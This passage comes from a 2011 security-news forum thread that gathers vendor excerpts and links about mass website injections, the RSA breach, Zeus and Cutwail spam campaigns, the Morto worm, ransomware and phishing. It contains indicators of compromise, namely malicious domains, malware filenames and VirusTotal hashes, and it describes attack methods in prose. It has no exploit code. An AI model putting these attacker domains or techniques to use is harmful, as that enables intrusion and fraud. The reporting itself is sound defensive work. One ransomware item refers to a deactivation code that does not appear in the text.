• Denial of Service attempts also increased during the second quarter and were observable in IPS logs;
• Global spam volumes remained fairly steady throughout the first half of 2011, while phishing increased in 2Q11, peaking at 4% of total volume in May 2011..."
* http://www.cisco.com/go/securityreport


2011-08-04, 20:27

Rapid relief for osCommerce administrators...
- http://h-online.com/-1324235
17 August 2011

willysy osCommerce now over 6M infected pages - Mass Injection ongoing...
- http://blog.armorize.com/2011/08/willysy-oscommerce-injection-over-6.html
8.03.2011 - "... With the number of infected pages now over 6 million, we've again updated our initial report on this willysy mass injection incident*..."
* http://blog.armorize.com/2011/07/willysycom-mass-injection-ongoing.html

- http://www.youtube.com/watch?v=1Jh_H4qQzqo
Uploaded by ArmorizeTech on Aug 3, 2011
"... recorded when infection number reached 6 million pages..."

Is That a Virus in Your Shopping Cart?
- https://krebsonsecurity.com/2011/08/is-that-a-virus-in-your-shopping-cart/
August 5, 2011

- http://h-online.com/-1317410
3 August 2011
- http://h-online.com/-1323427
16 August 2011

- http://www.usatoday.com/money/industries/technology/2011-08-11-mass-website-hacking_n.htm
"... A single criminal gang using computer servers located in the Ukraine is responsible for the latest twist in converting legit web sites into delivery mechanisms for 'driveby downloads'..."


2011-08-04, 21:43

HTran and APT ...
- http://www.secureworks.com/research/threats/htran/
August 3, 2011 - "... 'not surprising that hackers using a Chinese hacking tool might be operating from IP addresses in the PRC. Most of the Chinese destination IPs belong to large ISPs, making further attribution of the hacking activity difficult or impossible without the cooperation of the PRC government.
Conclusion: Over the past ten years, we have seen dozens of families of trojans that have been implicated in the theft of documents, email and computer source code from governments, industry and activists. Typically when hacking or malware traffic is reported on the Internet, the location of the source IP is not a reliable indicator of the true origin of the activity, due to the wide variety of programs designed to tunnel IP traffic through other computers. However, occasionally we get a chance to peek behind the curtain, either by advanced analysis of the traffic and/or its contents, or due to simple programmer/user error. This is one of those cases where we were lucky enough to observe a transient event that showed a deliberate attempt to hide the true origin of an APT. This particular hole in the operational security of a certain group of APT actors may soon be closed, however it is impossible for them to erase the evidence gathered before that time. It is our hope that every institution potentially impacted by APT activity will make haste to search out signs of this activity for themselves before the window of opportunity closes."
(More detail at the secureworks URL above.)

- https://www.computerworld.com/s/article/9218857/Researcher_follows_RSA_hacking_trail_to_China
August 4, 2011 - "... attackers gained access to RSA's network by convincing a small number of the company's employees to open malware-infected Excel spreadsheets. The spreadsheets included an exploit for a then-unpatched vulnerability in Adobe's Flash Player. Later attacks on the defense contractor Lockheed reportedly utilized information obtained in the RSA hack... Joe Stewart uncovered the location of the malware's command servers by using error messages displayed by a popular tool called "HTran," which Chinese hackers often bundle with their code. HTran bounces traffic between multiple IP addresses to mask the real identity of the order-giving servers, making it appear, for instance, that the C&C servers are in the U.S. when they are not... more than 60 malware families he's found that were custom-made for RSA-style attacks..."


2011-08-06, 13:09

Malware variants turn UAC off ...
- https://blogs.technet.com/b/mmpc/archive/2011/08/03/uac-plays-defense-against-malware.aspx
3 Aug 2011 - "... more and more malware opening a new front and turning UAC off itself. Malware does this to prevent users from seeing UAC prompts on every reboot for their payloads. The Sality virus family, Alureon rootkits, Rogue antivirus like FakePAV, Autorun worms, and the Bancos banking Trojans all have variants turning UAC off. So many are doing this that Microsoft Security Essentials, Windows Intune, and Forefront Endpoint Protection now uses behavior monitoring to find software that manipulates UAC settings, and the MMPC is finding brand new malware disabling UAC regularly. The key factor here is that for malware to successfully turn UAC off, the malware must itself be elevated to run as administrator. This elevation either requires an exploit in a service with administrator access, UAC to already be turned off, or a user clicking "OK" on a UAC prompt to allow the malware to elevate. Unfortunately, many Windows users have disabled UAC. While malware was mostly avoiding UAC altogether, legitimate software was also being rewritten to not require elevation prompts, so there are fewer UAC prompts than ever to wrangle, which should make it easier to spot any suspicious activity... UAC is not intended as malware protection, but it's another layer of security to help improve the safety of Windows. If you've been attacked from malware, please check the UAC setting in the control panel to see if it's been tampered*..."
* http://windows.microsoft.com/en-US/windows-vista/Turn-User-Account-Control-on-or-off

:fear: :mad:

2011-08-08, 13:08

Fake Firefox update email...
- http://nakedsecurity.sophos.com/2011/08/08/fake-firefox-update-email-malware/
August 8, 2011 - "... email which was spammed out this weekend pretending to be an advisory about a new update to the popular Firefox web browser... no surprises here. The link downloads an executable file, which bundles together an installer for Mozilla Firefox 5.0.1 -and- a password-stealing Trojan horse. Sophos already detected the Trojan horse as Troj/PWS-BSF... Firefox automatically updates itself - so you should never have to act upon an email like this. If you want to manually look for the latest update, simply open Firefox and go to the Help menu and select About Firefox..."


2011-08-11, 13:42

LinkedIn box to Uncheck...
- https://brandimpact.wordpress.com/2011/08/10/a-box-you-want-to-uncheck-on-linkedin/
August 10, 2011 - "Apparently, LinkedIn has recently done us the “favor” of having a default setting whereby our names and photos can be used for third-party advertising. A friend forwarded me this alert (from a friend, from a friend…) this morning. Devious. And I expect that you, like me, don’t want to participate... graphic shows you how to Uncheck The Box*... Nice try, LinkedIn. But, no thanks!
*UPDATE: After you finish with Account, check the new default settings under E-mail Preferences (such as Partner InMails); and Groups, Companies & Applications (such as Data Sharing with 3rd-party applications). It’s a Facebook deja vu!
* https://brandimpact.files.wordpress.com/2011/08/linkedin_social.png

> http://www.theregister.co.uk/2011/08/11/linkedin_privacy_stuff_up/

:sad: :fear: :rolleyes:

2011-08-12, 18:57

Zeus SPAM campaign...
- http://blogs.appriver.com/blog/digital-degenerate/zeus-works-the-tax-angle
August 10, 2011 - "The past couple of days we have been seeing a fairly large Zeus-laden campaign hitting our filters. These emails are also taking on a few different personas, the majority of which being the Internal Revenue Service. The other two, to a lesser extent, are the Federal Reserve, and the Nacha Electronic Payments Association which is a non-profit group that provides the rules and regulations for electronic transactions such as insurance premiums and mortgage loans. The group claims to have one of the largest and safest payment systems in the world. This may be true, but these imposters are anything but... Zeus is currently the most frequently seen pieces of malware circulating through interwebs. It works its way onto victim machines, and installs malicious software that siphons off bank account credentials. In this campaign in particular we have seen over 1 million pieces of these caught in our filters, at an average rate of around 1 every 2 seconds. Each of the emails contain a link to a remotely hosted file. The domains on which they're hosted are: irs-report-file .com, nacha-transactions .com, irs-tax-reports .com, federal-taxes .us, irs-alerts-report .com, federalresrve .com, files-irs-pdf .com, nacha-files .com, and nacha-security .com. The filenames vary depending on the facade being used. These include: wire-report.pdf.exe, your-tax-report.pdf.exe, 00000700955060US.pdf.exe, alert-report.pdf.exe, tax_00077034772.pdf.exe, transaction_report.pdf.exe, and 3029230818209.pdf.exe..."
(Screenshots available at the appriver URL above.)


2011-08-15, 20:18

SPAM - Virus Outbreak In Progress
- http://www.ironport.com/toc/
August 15, 2011

> http://tools.cisco.com/security/center/threatOutbreak.x?currentPage=1&sortOrder=d&pageNo=1&sortType=d

Website Profile Inquiry E-mail Msg...
- http://tools.cisco.com/security/center/viewThreatOutbreakAlert.x?alertId=23906
Misleading Tourism E-mail Msgs...
- http://tools.cisco.com/security/center/viewThreatOutbreakAlert.x?alertId=23905
Fake Personal Photo Attachment E-mail Msgs...
- http://tools.cisco.com/security/center/viewThreatOutbreakAlert.x?alertId=23881
Fake Blocked Credit Card Notification E-mail Msgs...
- http://tools.cisco.com/security/center/viewThreatOutbreakAlert.x?alertId=23820


2011-08-18, 04:40

SPAM - Virus Outbreak In Progress
- http://www.ironport.com/toc/
August 17, 2011

- http://tools.cisco.com/security/center/threatOutbreak.x?currentPage=1&sortOrder=d&pageNo=1&sortType=d

Fake Parcel Delivery Failure Notification E-mail Msgs...
- http://tools.cisco.com/security/center/viewThreatOutbreakAlert.x?alertId=23917
Fake Digital Telegram Notification E-mail Msgs...
- http://tools.cisco.com/security/center/viewThreatOutbreakAlert.x?alertId=23946
Fake Invoice Payment Notification E-mail Msgs...
- http://tools.cisco.com/security/center/viewThreatOutbreakAlert.x?alertId=23915
Fake Mobile Communication E-mail Msgs...
- http://tools.cisco.com/security/center/viewThreatOutbreakAlert.x?alertId=23916
Fake Traffic Ticket E-mail Msgs... *
- http://tools.cisco.com/security/center/viewThreatOutbreakAlert.x?alertId=23945
Fake Personal Photo Attachment E-mail Msgs...
- http://tools.cisco.com/security/center/viewThreatOutbreakAlert.x?alertId=23881
Fake Antivirus Update E-mail Msgs...
- http://tools.cisco.com/security/center/viewThreatOutbreakAlert.x?alertId=23931
Malicious Changelog Attachment E-mail Msgs...
- http://tools.cisco.com/security/center/viewThreatOutbreakAlert.x?alertId=23588

- http://nakedsecurity.sophos.com/2011/08/18/trojans-spammed-out-in-malicious-wave-of-fake-dhl-emails/
August 18, 2011

* http://sunbeltblog.blogspot.com/2011/08/of-spam-and-speeding.html
August 18, 2011

* http://nakedsecurity.sophos.com/2011/08/17/uniform-traffic-ticket-malware-attack-widely-spammed-out/
August 17, 2011

- http://nakedsecurity.sophos.com/2011/08/15/malware-email-blocked-credit-card/
August 15, 2011

Malicious SPAM volume chart - last 28 days
- http://community.websense.com/cfs-filesystemfile.ashx/__key/CommunityServer.Blogs.Components.WeblogFiles/securitylabs/5226.S4.png
18 Aug 2011


2011-08-18, 16:11

Mass compromise ongoing, spreads fake antivirus
- http://blog.armorize.com/2011/08/k985ytvhtm-fake-antivirus-mass.html
8.17.2011 - "On August 14, we started to see mass compromise of websites to inject malicious iframes that spread fake antivirus malware. The attack is ongoing... We estimate at least 22,400 unique DOMAINS. The attackers' first attempt was not successful and therefore google indexed more than 536,000 infected pages. However, since then the attackers have fixed the injected pattern and therefore the injected script is executed rather than displayed. Google therefore does not index infected websites any longer...
4. Browser Exploitation: Drive-by download script served by a modified version of the BlackHole exploit pack.
5. Malware: Fake antivirus, different names in different OS: "XP Security 2012" under Windows XP, "Vista Antivirus 2012" under Windows Vista, and "Win 7 Antivirus 2012" under Windows 7.
6. Injection method: Primarily via stolen FTP credentials, and then use automated program to FTP, retrieve files, inject iframe, and upload back. FTP credentials are stolen from personal Windows computers that have been infected with malware. Malware searches stored password files of FTP clients and also sniffs the FTP traffic. Stolen credentials are sent back to the attackers.
7. Malicious domains and IPs... (shown/listed at the armorize.com URL above.)
8. Antivirus detection rate: Currently 5 out of 43 on VirusTotal*..."
* https://www.virustotal.com/file-scan/report.html?id=a1bd3278d34d8484ef89dd679c5e2e241c18feebdc11cde042fc7ce1c325b061-1313382824
File name: contacts.exe_
Submission date: 2011-08-15 04:33:44 (UTC)
Result: 5/43 (11.6%)


2011-08-19, 00:57

Google report - 4 years of experience in malware detection
- http://h-online.com/-1325798
18 August 2011 - "Google has announced* the publication of a technical report entitled "Trends in Circumventing Web-Malware Detection". This report describes the results of analysing four years of data – from 160 million web pages hosted on approximately eight million sites – collected through the company's Safe Browsing initiative. The report comments that "Like other service providers, we are engaged in an arms race with malware distributors", and that each day Google issues around three million malware warnings to over four hundred million users that use browsers supporting the Safe Browsing API. The report looks into the four most commonly employed methods for detecting malware: virtual machine client honeypots, browser emulator client honeypots, classification based on domain reputation, and anti-virus engines and trends in how well they work in practice..."
* http://googleonlinesecurity.blogspot.com/2011/08/four-years-of-web-malware.html

See also:
- http://h-online.com/-1155534

- http://h-online.com/-986087

- http://www.darkreading.com/taxonomy/index/printarticle/id/231500264
Aug 18, 2011

:fear: :fear:

2011-08-20, 19:20

SPAM - Virus Outbreak In Progress
- http://www.ironport.com/toc/
August 20, 2011

- http://tools.cisco.com/security/center/threatOutbreak.x?currentPage=1&sortOrder=d&pageNo=1&sortType=d

Fake Security Update Notification E-mail Msgs...
- http://tools.cisco.com/security/center/viewThreatOutbreakAlert.x?alertId=23971
Malicious Images Attachment E-mail Msgs...
- http://tools.cisco.com/security/center/viewThreatOutbreakAlert.x?alertId=23970
Fake Personal Photo Attachment E-mail Msgs...
- http://tools.cisco.com/security/center/viewThreatOutbreakAlert.x?alertId=23881
August 19, 2011

Malware-laden spam jumps to 24 percent of all spam this week
- http://www.darkreading.com/taxonomy/index/printarticle/id/231500190
Aug 18, 2011

- http://labs.m86security.com/2011/08/massive-rise-in-malicious-spam/
August 16, 2011 - "... The majority of the malicious spam comes from the Cutwail botnet, although Festi and Asprox are among the other contributors..."
- http://labs.m86security.com/wp-content/uploads/2011/08/spammedmalware31.png


2011-08-23, 15:31

SPAM - Virus Outbreak In Progress
- http://www.ironport.com/toc/
Updated: August 26, 2011

- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Fake Facebook Photo Notification E-mail Msgs...
- http://tools.cisco.com/security/center/viewThreatOutbreakAlert.x?alertId=23974
Fake Traffic Violation Ticket E-mail Msgs...
- http://tools.cisco.com/security/center/viewThreatOutbreakAlert.x?alertId=23982
Malicious Changelog Attachment E-mail Msgs...
- http://tools.cisco.com/security/center/viewThreatOutbreakAlert.x?alertId=23588

m86 Spam Volume Index
- https://www.m86security.com/images/trace/302/302-16-SVI_time.gif
"... representative sample of the honeypot domains that we monitor."


2011-08-27, 05:25

RSA hack file found...
- http://www.f-secure.com/weblog/archives/00002226.html
August 26, 2011 - "... the hackers broke into RSA with a targeted email attack. They planted a backdoor and eventually were able to gain access to SecurID information that enabled them to go back to their original targets and succesfully break into there... we knew that the attack was launched with a targeted email to EMC employees (EMC owns RSA), and that the email contained an attachment called "2011 Recruitment plan.xls". RSA disclosed this information in their blog post... we had the original email. Turns out somebody (most likely an EMC/RSA employee) had uploaded the email and attachment to the Virustotal online scanning service on 19th of March. And, as stated in the Virustotal terms, the uploaded files will be shared to relevant parties in the anti-malware and security industry. So, we all had the file already. We just didn't know we did, and we couldn't find it amongst the millions of other samples... It was an email that was spoofed to look like it was coming from recruiting website Beyond.com. It had the subject "2011 Recruitment plan" and one line of content:
"I forward this file to you for review. Please open and view it".
The message** was sent to one EMC employee and cc'd to three others... The embedded flash object shows up as a [X] symbol in the spreadsheet. The Flash object is executed by Excel (why the heck does Excel support embedded Flash is a great question). Flash object then uses the CVE-2011-0609*** vulnerability to execute code and to drop a Poison Ivy backdoor to the system. The exploit code then closes Excel and the infection is over. After this, Poison Ivy connects back to it's server at good.mincesur .com. The domain mincesur .com has been used in similar espionage attacks over an extended period of time... Once the connection is made, the attacker has full remote access to the infected workstation. Even worse, it has full access to network drives that the user can access. Apparently the attackers were able to leverage this vector further until they gained access to the critical SecurID data they were looking for. The attack email does not look too complicated. In fact, it's very simple. However, the exploit -inside- Excel was a zero-day at the time and RSA could not have protected against it by patching their systems..."
* http://blogs.rsa.com/rivner/anatomy-of-an-attack/

** http://www.f-secure.com/weblog/archives/sra2011_1.png

*** http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-0609
Last revised: 04/21/2011
CVSS v2 Base Score: 9.3 (HIGH)
(-before- Flash Player - see:
- https://www.adobe.com/support/security/advisories/apsa11-01.html March 14, 2011)


2011-08-27, 23:20

Apple iCloud phishing attacks ...
- http://nakedsecurity.sophos.com/2011/08/26/welcome-to-apple-icloud-phishing-attacks/
August 26, 2011 - "... The email claims to come from Apple, and appears to have targeted our correspondent because he is a user of Apple's MobileMe service. Apple is planning to shut down its MobileMe service in mid-2012, as it is readying its new iCloud service (which will store music, photos, calendars, documents etc in 'the cloud' and wirelessly push them to all of your devices). Understandably, a lot of MobileMe users are interested in how they will migrate to iCloud and this is the issue that the phishing email uses as bait... Yes, it's a phishing website. And just look what it's asking for: your credit card details, your address, your social security number, your full date of birth, your mother's maiden name and your Apple ID credentials... Imagine the harm a fraudster could cause with all that information. Make sure you have your eyes peeled for phishing attacks, and be on your guard regarding unsolicited messages you receive in your inbox..."
(Screenshots and more detail available at the Sophos URL above.)


2011-08-28, 05:29

Hurricanes prompt phishing scams...
- https://www.computerworld.com/s/article/9219530/DHS_warns_that_Irene_could_prompt_phishing_scams
August 26, 2011 - "... cybercriminals go into -overdrive- during highly publicized physical events such as hurricanes and earthquakes... The DHS is responsible for protecting critical infrastructure targets in the U.S. Until relatively recently, phishing -was- considered mostly a consumer problem. But the use of phishing emails to successfully breach the Oak Ridge National Laboratory, EMC's RSA security division, Epsilon and the Pacific Northwest National Laboratory have quickly changed that view. Over the past few years, phishers have increasingly taken advantage of natural disasters and other highly publicized incidents to slip infected emails and other malware onto users' desktops..."

- http://www.fbi.gov/news/news_blog/charity_082611
08.26.11 - "In light of Hurricane Irene, the public is reminded to beware of fraudulent e-mails and websites claiming to conduct charitable relief efforts. Disasters prompt individuals with criminal intent to solicit contributions purportedly for a charitable organization or a good cause. To learn more about avoiding online fraud, please see "Tips on Avoiding Fraudulent Charitable Contribution Schemes" at:
> http://www.ic3.gov/media/2011/110311.aspx "

- https://www.us-cert.gov/current/#potential_hurricane_irene_phishing_scams
August 29, 2011


2011-08-29, 15:24

Morto worm spreads via RDP - Port 3389/TCP
- http://www.theregister.co.uk/2011/08/28/morto_worm_spreading/
28 August 2011 - "... an Internet worm dubbed “Morto” spreading via the Windows Remote Desktop Protocol (RDP). F-Secure is reporting that the worm is behind a spike in traffic on Port 3389/TCP. Once it’s entered a network, the worm starts scanning for machines that have RDP enabled. Vulnerable machines get Morto copied to their local drives as a DLL, a.dll, which creates other files detailed in the F-Secure post*... SANS (ISC)**, which noticed heavy growth in RDP scan traffic over the weekend, says the spike in traffic is a “key indicator” of a growing number of infected hosts. Both Windows servers and workstations are vulnerable..."
* http://www.f-secure.com/weblog/archives/00002227.html

** https://isc.sans.edu/diary.html?storyid=11470
- https://isc.sans.edu/diary.html?storyid=11452

- http://h-online.com/-1332673
29 August 2011


2011-08-30, 15:12

Malicious SPAM campaign - Facebook
- http://labs.m86security.com/2011/08/want-to-be-friends-on-facebook-dont-click-the-link/
August 29, 2011 - "... we are now observing another large malicious spam campaign – this time without attachments. Like the majority of last week’s campaigns, this spam is being sent out from the Cutwail botnet. The message arrives as a fake Facebook friend invite notification. The message looks convincing, it appears the spammers have copied the actual Facebook template and substituted their own links. However, there are clues it is fake. The message doesn’t contain any profile photos, and they have omitted the recipient’s email address in the fine print at the bottom... Clicking the link fetches a web page that contains two ways you can infect yourself. First, there is a link pretending to be an Adobe Flash update where you can download and install malware manually. Second, there is a hidden iframe that loads data from a remote server hosting the Blackhole Exploit Kit, which attempts to automatically exploit vulnerabilites on your system, notably Java..."
(Screenshots available at the m86 URL above.)


2011-09-02, 14:58

FTC malicious email campaign
- http://community.websense.com/blogs/securitylabs/archive/2011/09/01/return-of-the-ftc-malicious-email-campaign.aspx
01 Sep 2011 - "Websense... has detected malicious emails posing as a consumer complaint notice from the Federal Trade Commission... The exact email format seen in this case was also used a few years back... Malware authors constantly change the malicious file involved in their campaigns. The malware is poorly detected by AV engines*..."
(Screenshot available at the websense URL above.)
* https://www.virustotal.com/file-scan/report.html?id=45bf8a3b21d05a31224e5cb718746d2e4c2e6d486ccd4c33fcf4a8ac53919d28-1314955779
File name: complaint9302.vcr
Submission date: 2011-09-02 09:29:39 (UTC)
Result: 18/44 (40.9%)
There is a more up-to-date report...
- https://www.virustotal.com/file-scan/report.html?id=45bf8a3b21d05a31224e5cb718746d2e4c2e6d486ccd4c33fcf4a8ac53919d28-1315065041
File name: 1315064295.complaint9302.scr
Submission date: 2011-09-03 15:50:41 (UTC)
Result: 25/44 (56.8%)

- http://www.ftc.gov/opa/2011/09/scamemail.shtm
09/01/2011 - "The FTC is warning small businesses that an email with a subject line “URGENT: Pending Consumer Complaint” is -not- from the FTC. The email says that a complaint has been filed with the agency against their company. The FTC advises not to click on any of the links or attachments with the email. Clicking on the links may install a virus on the computer. The FTC’s advice: Delete the email..."


2011-09-05, 18:15

DNS hijacks ...
- http://h-online.com/-1336589
5 September 2011 - "A number of popular web sites were hit by a DNS hijack attack; The Daily Telegraph, UPS, The Register, National Geographic, Vodafone, Betfair and Acer were all affected. By modifying the DNS records for the sites, rather than directly attacking them, visitors to the sites were redirected to a site by "TurkGuvenligi" which declares "h4ck1n9 is not a cr1m3". Some of the sites shut down password protected services during the attack to ensure that users attempting to log in were not compromised. Correct DNS records have now been generated and have been propagating in the DNS system overnight..."

> http://zone-h.org/news/id/4741
"... all use NetNames as their registrar. It appears that the turkish attackers managed to hack into the DNS panel of NetNames using an SQL injection..."

- http://nakedsecurity.sophos.com/2011/09/04/dns-hack-hits-popular-websites-telegraph-register-ups-etc/
September 4, 2011

- http://blog.sucuri.net/2011/09/ascio-registrar-compromised-brings-down-ups-com-theregister-and-others.html
September 4, 2011

:sad: :fear:

2011-09-06, 15:56

Fake Offers with Fake Trust Seals
- http://www.symantec.com/connect/blogs/fake-offers-fake-trust-seals
Sep. 5, 2011 - "... Symantec observed a phishing site that utilized a number of new tricks. The phishing site masqueraded as a well known software company and claimed to offer associated software products at discounted rates. The phishing page highlighted these fake offers as “summer offerings” and stated that customers could save 80% on their purchases. Users were prompted to enter their billing information, personal information, and credit card details to complete their purchases... If any users had fallen victim to the phishing site, the phishers would have successfully stolen their confidential information for financial gain... The phishing site was hosted on a newly registered domain name, and this new domain name was indexed in several popular search engines and had a very high page ranking. Phishers achieved the boosted page ranking by using common search keywords for the products within the domain name. For example, the domain would look like “common-search-keywords.com”. Thus, if a user searched with these keywords in a search engine, they could end up with the phishing site as a high-ranked result... The phishing page also contained fake trust seals at the bottom of the page. A legitimate trust seal is a seal provided to Web pages by a third party, typically a software security company, to certify that the website in question is genuine. Clicking on a trust seal will pop up a window provided by the third party, which contains details of the site name and the encryption data used to secure the site...
Internet users are advised to follow best practices to avoid phishing attacks:
• Do not click on suspicious links in email messages.
• Avoid providing any personal information when answering an email.
• Never enter personal information in a pop-up page or screen.
• When entering personal or financial information, ensure the website is encrypted with an SSL certificate by looking for the padlock, ‘https’, or the green address bar.
• Frequently update your security software..."
(Screenshots available at the symantec URL above.)


2011-09-07, 14:06

Fake e-mails from Electronic Payments Association NACHA
- http://community.websense.com/blogs/securitylabs/archive/2011/09/06/fraudulent-messages-from-electronic-payments-association-nacha.aspx
06 Sep 2011 - "Websense... has been tracking a large number of messages masquerading as legitimate messages from the Electronic Payment Association NACHA. The messages bear legitimate traits, as the display name and routing details seem to confirm. Further analysis of the message and attachments prove these to be malicious in intent... an unsuspecting member or patron of the service might just fall for this... The use of a double extension on a file name as well as the exact format of the message, including the Subject, attests to the reuse of the campaign... Although this might seem to have come from NACHA, the routing details suggest otherwise as they do not originate from the publicly-known MX records for the organization... VirusTotal results*..."
(Screenshots available at the websense URL above.)
* https://www.virustotal.com/file-scan/report.html?id=06f4a26124cc408c85e864abd3b51ff4de2b74cad75d920e953281cc9a6fde91-1315379402
File name: FormApp_23131.zip
Submission date: 2011-09-07 07:10:02 (UTC)
Result: 30/44 (68.2%)

ACH spam campaign analysis...
- http://labs.m86security.com/2011/09/an-analysis-of-the-ach-spam-campaign/
September 6, 2011 - "... Automated Clearing House (ACH) is an an electronic network for financial transactions in the United States overseen by NACHA. Last week, we came across a suspicious looking spam campaign with the unusual subject line “UAE Central Bank Warning: Email scam alert”. After closer investigation, we determined that it was indeed a fake ACH notification. The message contained an attached malicious file using the filename “document.zip”. As suspected, the malicious file attachment was a downloader that we have seen a lot of lately – Chepvil... The Chepvil downloader, unsurprisingly, proceeded to retrieve more than just one piece of additional malware. First was the password stealing malware, Zbot... downloading the file “s.exe” – a Zbot variant**... The file “22.exe” was interesting because we had not encountered it before. It was detected*** by 22 out of 45 antivirus programs... Upon execution, the proxy spambot drops a copy of itself in the Windows TEMP folder as svchost.exe... This spambot’s recent spamming activities includes both pharmaceutical, and further ACH campaigns that appears to be from NACHA.org; and are very similar to the one which led to this infection in the first place..."
** https://www.virustotal.com/file-scan/report.html?id=14c231ee3a70b07bcf622c91a34d60a6219166ccfd3e47b8db58412dd8b2f6fd-1315391834
File name: file
Submission date: 2011-09-07 10:37:14 (UTC)
Result: 34/44 (77.3%)
*** https://www.virustotal.com/file-scan/report.html?id=9d4abcbb25590c398c693822cc6f7f15bae6ad50a005a95a34ad7137cf5ee3ee-1315187924
File name: svchost.exe
Submission date: 2011-09-05 01:58:44 (UTC)
Result: 31/44 (70.5%)

Virus Outbreak In Progress
- http://www.ironport.com/toc/
Sep. 7, 2011

- http://tools.cisco.com/security/center/threatOutbreak.x?i=77

Malicious Account Information E-mail Msgs...
- http://tools.cisco.com/security/center/viewThreatOutbreakAlert.x?alertId=24092
Fake Parcel Delivery Failure Notification E-mail Msgs...
- http://tools.cisco.com/security/center/viewThreatOutbreakAlert.x?alertId=23917
Fake Presentation E-mail Msgs...
- http://tools.cisco.com/security/center/viewThreatOutbreakAlert.x?alertId=24082
Fake FDIC Document E-mail Msgs...
- http://tools.cisco.com/security/center/viewThreatOutbreakAlert.x?alertId=24028
Malicious Changelog Attachment E-mail Msgs...
- http://tools.cisco.com/security/center/viewThreatOutbreakAlert.x?alertId=23588


2011-09-10, 17:01

Ransomware posing as Microsoft
- http://pandalabs.pandasecurity.com/ransomware-posing-as-microsoft/
09/6/11 - "... Once you get infected (you can receive it in a number of different ways, most likely via spam messages and P2P), your computer is restarted. What for? Well, the malware installs itself to run every time your computer is started... The threat is clear: your Microsoft Windows authenticity could not be verified, you need to have it fixed, which is just a 100€ payment. They give you the payment instructions and before saying goodbye they let you know that in case you don’t pay you’ll lose access to the computer and will lose all your data, as well as that the district attorney’s office has already your IP address and that you’ll be prosecuted in case you fail to pay... that would scare anyone that doesn’t know this is a ransomware attack... for all of you that wouldn’t like to pay anything to these bastards, this is the code you can use to deactivate it:
Doing that your computer will be restarted and the registry key created by this malware (detected as Ransom.AN) will be removed, as well as the malware file..."


2011-09-14, 21:53

Ransomware uses false child porn accusations
- http://www.malwarecity.com/blog/cyber-extortion-scam-issues-false-child-porn-accusations-1127.html
5 September 2011 - "Russian cyber-criminals are coupling false accusations of child pornography with real software damage in a new scam that attempts to extort 500-ruble ($17) payments out of victims, according to an analysis by Bitdefender. Once infected with Trojan.Agent.ARVP malicious software, spread via innocent-seeming links, the victim receives a note stating that child pornography has been found on the computer and the user must pay a “fine” via a payment service. To back up the demand, the Trojan blocks the computer, effectively holding the system ransom. The scam marks an extension of the traditional activities of Russian cyber-criminal gangs, many of whom specialize in offering fake anti-virus solutions, or in frauds such as the “Russian bride scam,” which seeks to con European or North American men out of money by posing as beautiful Russian women seeking husbands from abroad. The child-porn scam targets Russian speakers for now but such attacks are often translated into English and other languages to spread further... The ransom note is scaled to take up to 90 percent of the screen and whatever is behind it is invalidated. Other emergency tools such as Task Manager, Windows Explorer and User Init Logon Application are killed and overwritten with copies of the Trojan, which prevents the operating system from initializing and running properly. The scammers says the user must pay within 12 hours or the “child-porn” case will be forwarded to the local police and all data stored on the personal computer will be blocked or deleted, the operating system uninstalled and the BIOS erased. In reality, the data will still be there and the BIOS will not be affected after the 12-hour deadline passes... Paying the ransom will -not- unlock it. In-depth analysis of the malware revealed that there is no way to unlock the PC, so the promise of a code is false. Messages such as this should immediately raise suspicions... To remain safe from such scams, users are advised to scrutinize links they come across and avoid as much as possible clicking on URLs they have not specifically searched for."


2011-09-16, 16:45

Corporate account credentials phished...
- http://www.finextra.com/news/fullstory.aspx?newsitemid=22957
16 September 2011 - "The FBI is currently investigating over 400 reported cases of corporate account takeovers, where cyber crooks have used ACH and wire transfers to steal tens of millions of dollars from US businesses. The scale of the problem was revealed this week by the bureau's assistant director in the cyber division, Gordon Snow, in testimony to a House Financial Services Committee subcommittee. Smart says business employees are being targeted by phishing e-mails containing infected files or links to suspect Web sites, enabling criminals to install -malware- on their computers to harvest online banking credentials. The FBI is looking in to over 400 cases where crooks have used this information to steal money from firms' accounts, involving the attempted theft of over $255 million and the actual loss of around $85 million..."


2011-09-16, 22:24

Malvertising on Bing and Yahoo...
- http://sunbeltblog.blogspot.com/2011/09/bing-yahoo-search-adverts-serve-up.html
September 16, 2011 - "... adverts being displayed in Bing that were directing end-users to malicious content. These adverts were promoting all manner of downloads including Firefox, Skype and uTorrent. Some of the search terms used:
FireFox Download - Download Skype - Download Adobe Player...
Clicking the adverts takes end-users to sites such as river-park(dot)net, and they do a pretty good job of convincing visitors that these sites are the real deal (incidentally, you'll notice that some of the ads display the "real" URL of the program mentioned, but take you to a rogue site such as the "Download uTorrent Free" advert... which actually takes you to aciclistaciempozuelos(dot)es/torrent)... All of the malicious downloads are coming from en-softonic(dot)net... the fake Firefox file installs a rootkit, runs IE silently in the background attempting clickfraud and also performs Google redirects. Current VirusTotal score for that one is 16/44*, and we detect it as Win32.Malware!Drop. These adverts were also appearing in Yahoo search - we notified both Yahoo and Microsoft, and both companies are in the process of killing these things off. It's entirely possible these sites will show up somewhere else..."
(Screenshots available at the sunbeltblog URL above.)
* https://www.virustotal.com/file-scan/report.html?id=d20c12348e014b782234cbff8d282cd9d566c86e6b2cda2cebee44aca43cf7aa-1316154205
File name: Backup.exe
Submission date: 2011-09-16 06:23:25 (UTC)
Result: 16/44 (36.4%)


2011-09-21, 13:50

Scare tactics used in malicious emails ...
- http://community.websense.com/blogs/securitylabs/archive/2011/09/20/_2200_We-are-going-to-sue-you_2200_-spam.aspx
20 Sep 2011 - "... Websense... has detected that an email campaign broke out on 19th September, 2011. In this campaign, emails are spoofed to appear as though they are sent from established companies. The emails even formally claims that legal action will be taken because of the spam you have sent. These emails with the fake warning even attach a ZIP file that contains a scanned copy of a document that is supposed evidence of your spam... The spam outbreak uses several alerting subject headings to attract readers' attention. The ZIP file is actually an EXE file disguised as a document after decompression. It's a kind of Trojan.Downloader virus confirmed by VirusTotal*. When the trojan triggers, it copies itself to the system path under the Startup folder and deletes itself. Whenever you start the computer, the trojan will execute. This trojan can connect to remote servers and download malicious files... This campaign could potentially contain other variants of the trojan as attachments..."
(Screenshots available at the websense URL above.)
* https://www.virustotal.com/file-scan/report.html?id=fb47da8e43e1387f5bccd07bf35b7b2c6ff93920a9ea3cf1817bd2006c4f0b5b-1316594716
File name: 2166218
Submission date: 2011-09-21 08:45:16 (UTC)
Result: 29/44 (65.9%)

- http://community.websense.com/blogs/securitylabs/archive/2011/09/22/fake-malware-notifications-from-websense-labs.aspx
22 Sep 2011


2011-09-21, 16:38

